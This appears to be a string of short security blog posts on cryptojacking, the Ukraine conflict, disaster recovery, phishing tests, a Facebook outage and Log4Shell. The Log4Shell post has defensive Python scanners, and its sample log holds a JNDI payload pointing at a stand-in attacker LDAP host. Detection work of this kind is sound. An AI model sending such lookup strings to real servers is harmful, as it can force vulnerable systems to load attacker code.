Given the recent tanking of bitcoin's value in the open market, you might think that the criminal exploitation of private computers for coin mining would start to slow, but I guess the cyber bad guys of the world need to compensate for their value losses and mine new coins.
This article from the great team over at InfoSecurity is a great overview. Enjoy and beware!
All large, modern military operations are heavily reliant on satellites to provide a variety of logistics and planning information related to battlefield operations. That information includes GPS coordination and navigation, topographic imaging, drone command & control, and many other surveillance functions. Threats to Russia’s satellite infrastructure by those in opposition to the invasion and ongoing conflict in Ukraine have prompted Russian officials to respond and to respond harshly.
The following article from the great team at InfoSecurity details the Russian response / denial to hacking attempts against their satellite infrastructure:
Simply put, military conflicts are not what they used to be. So far during the conflict in Ukraine, we have seen the Russian space authority make a less than veiled threat against the safety of the International Space Station. We have also seen the delay and/or cancellation of satellite launches from Russian space facilities for agencies, governments, and organizations that oppose Russian activity in Ukraine. There are many factors to take into consideration, both short term and long term, when considering orbital resources and the effect this ongoing conflict can and will have on national and international assets in space.
Russia is still a primary partner in the ISS program and still provides the primary transportation and recovery services for the space station. Those services will most likely be on hold for the foreseeable future. The Russian space agency also provides satellite launch services for many nations and private agencies around the world. Those services have become a bargaining chip for international negotiations moving forward.
It will be very interesting to watch these situations develop over the weeks and months to come. We are seeing the Cold War rekindle and works of fiction from recent TV shows and movies begin to come to life as scenarios play out on the “final frontier”.
As strange as this may sound, military attacks are no longer simply about soldiers and tanks and planes and bombs. Needless to say, there is nothing simple about war, but thanks to state sponsored hacking and the connected nature of critical infrastructure, cyber warfare has become a new front for every new military conflict. The conflict brewing in Ukraine is no different.
Threat levels have been raised by numerous national and international cybersecurity organizations, and malicious cyber activity related to this current conflict is already being monitored. Please remember that the types of attacks associated with these nation state conflicts are not perfectly crafted and restricted to only military targets. They can overflow into civilian networks and spread around the world in a matter of hours. NotPetya is a prime example of targeted cyber warfare run amok.
Take the time to prepare your environments and make sure all your controls are in place and up to date. The Internet is poised to see quite a bit of malicious cyber activity in the days and weeks to come.
This article from the team at Dark Reading is an excellent overview of the challenges and approaches to DR testing, as well as a great reminder of the value and influence of the human factor. All successful disaster recovery planning starts with people – it's all about teamwork, collaboration, and communication during an event.
We are well into the second week of reaction and remediation associated with the Apache Log4j vulnerability, so I wanted to pause and take a moment to recap what we know, what we should be doing now, and what we should be considering moving forward. Let us start with what we know.
The Log4j vulnerability (dubbed Log4Shell, CVE-2021-44228) is a remote code execution (RCE) flaw that can force the download of a malicious payload on vulnerable web servers and computers, depending on the presence and/or configuration of certain server components. Specifically, exploitation of the vulnerability requires a single HTTP request containing malicious input, sent from anywhere in the world to an internet-facing server running a vulnerable instance of Log4j, or the same HTTP request sent to a vulnerable computer within a compromised local network. The result is a full system compromise, and the exploit requires no authentication. It is important to stress that the Log4j vulnerability is not limited to Internet-facing web servers only. If a bad actor gains access to a local network, the same HTTP requests can be sent internally to IP-enabled devices on that network to compromise vulnerable systems. This is a very serious potential attack vector, and all of us should be working diligently to ensure all our devices and those of our friends, family, and clients are safe and properly protected.
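To make the "single HTTP request containing malicious input" idea concrete, here is a minimal defensive sketch that greps log lines for the classic JNDI lookup string used in Log4Shell probes. This is an assumption-laden simplification: real payloads use heavy obfuscation (nested lookups like `${${lower:j}ndi:...}`), so a production scanner needs far more than one regex.

```python
import re

# Simplified pattern for the classic JNDI lookup string seen in Log4Shell
# probes. Real-world payloads are often obfuscated and will evade this.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|rmi|dns)s?://", re.IGNORECASE)

def find_suspicious_lines(log_lines):
    """Return (line_number, line) pairs containing a basic JNDI lookup string."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        if JNDI_PATTERN.search(line):
            hits.append((number, line))
    return hits

# Illustrative log lines (hypothetical), showing a benign request and a probe.
sample = [
    "GET /index.html HTTP/1.1 200",
    "User-Agent: ${jndi:ldap://attacker.example/a}",
]
for number, line in find_suspicious_lines(sample):
    print(f"line {number}: {line}")
```

This mirrors the "look for log entries indicating malicious inbound activity" detection approach discussed below, and it illustrates why that method only tells you someone *probed* the system, not whether the system is actually vulnerable.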
So what should we be doing now? First and foremost, we should all be scanning our computers, servers, and other IP-enabled devices to look for vulnerable versions of Log4j. At this point, there are numerous scanning tools available from security experts, RMM vendors, and other platforms from which to choose. Please remember that these scanning tools take different approaches to identifying potentially vulnerable systems and devices. Some look for the presence of Log4j-associated jar files. Others look for log entries on the device indicating the presence of malicious inbound activity. And then others actually send crafted HTTP requests looking for vulnerable system responses. Given these different detection methods, make sure to understand your scan results and take the time to verify the findings before you start pulling systems, servers, and devices offline.
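The first detection method above – looking for Log4j-associated jar files – can be sketched in a few lines. This is a name-only scan under stated assumptions (standard `log4j-core-x.y.z.jar` file names); copies embedded inside fat jars or .war archives will not be found this way, which is exactly why commercial scanners also inspect archive contents.

```python
import os
import re

# Match standard log4j-core jar file names and capture the version digits.
# Name-only scanning is a heuristic; embedded copies will be missed.
JAR_NAME = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$", re.IGNORECASE)

def scan_for_log4j(root):
    """Walk a directory tree and report log4j-core jars with their versions."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            match = JAR_NAME.search(name)
            if match:
                version = tuple(int(part) for part in match.groups())
                findings.append((os.path.join(dirpath, name), version))
    return findings
```

A finding here is a starting point for verification, not proof of exploitability – which is the same caution that applies to the commercial tools.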
Once you verify the presence of a vulnerable Log4j component, the next step involves determining why the component is present on that system or device, and then reaching out to the application or device vendor to find updates, patches, and/or mitigation instructions. Log4j is so ubiquitous in applications, servers, and IP-enabled appliances, and application and IoT vendors have embedded and leveraged it in hundreds of different ways, that vendor support may be a necessity to ensure you properly remediate the problem.
Once you have remediated the Log4j vulnerability on all your IP-enabled systems and devices, what do you do next? It is at this point that we all need to stop, document what we have done, take stock of what worked and what did not, and then be prepared to do it all over again in the future. The Log4j vulnerability is not going away. Scanning for this particular vulnerability needs to become part of your overall vulnerability management program. You will inevitably purchase new applications, devices, and systems, and you need to ensure Log4j, if used, is properly updated (version 2.16 or later at this point in the component evolution). Also, as you work with your application vendors moving forward, some may try to convince you that the risk of Log4j only applies to web-exposed servers and devices. This statement is simply not true. Push back against these statements. Push back hard.
Nothing I have said about vulnerability management in this article is new, and nothing is particularly unique to Log4j. Scan your networks regularly (at least quarterly – more frequently if possible) and review those scan reports. Remediate your findings. If a finding cannot be remediated, budget for a replacement application or device. Keep your applications, components, and operating systems up to date. Cybercriminals are not going away. They don’t take vacations, and they don’t care how many other projects you are working on that prevented you from vulnerability remediation this month or this quarter. The threats are real and we all have to keep playing great defense. Good Luck!
The following is a great webpage from U.S. CERT on Log4j and associated resources:
October is Cybersecurity Awareness Month and as such I am going to make an effort to post as many awareness and training tips and tricks as I can throughout the month. This great article from the team over at Tripwire provides some sound advice – let the phishing test run its course! Enjoy the read and share what you learn. We are all in this cybersecurity battle together!
Given the timing of the outage for many of Facebook’s platforms yesterday – in the middle of the media storm surrounding a whistleblower from within the company sharing details of the social media giant’s potentially selfish decision-making processes – lots of people were questioning whether this was a malicious attack against the company’s infrastructure. Alas, it was not, at least according to the engineering team at Facebook.
According to an Infrastructure VP at Facebook, this outage stemmed from human error associated with a misconfigured BGP routing update. To be honest, this makes more sense than a successful targeted external attack. Now, if you really wanted to go full-on conspiracy theory, one could question whether the human error was intentional or unintentional, aka a distraction from the press coverage of the whistleblower. But that is not within my purview.
Though the general report content of this article is not surprising, the stats provided are very helpful in terms of planning and training for end users dealing with an influx of SPAM and malicious emails. The analysis performed by the team at Tessian is quite thorough and provides some great insight around targeted industries and email delivery timing. Enjoy the read…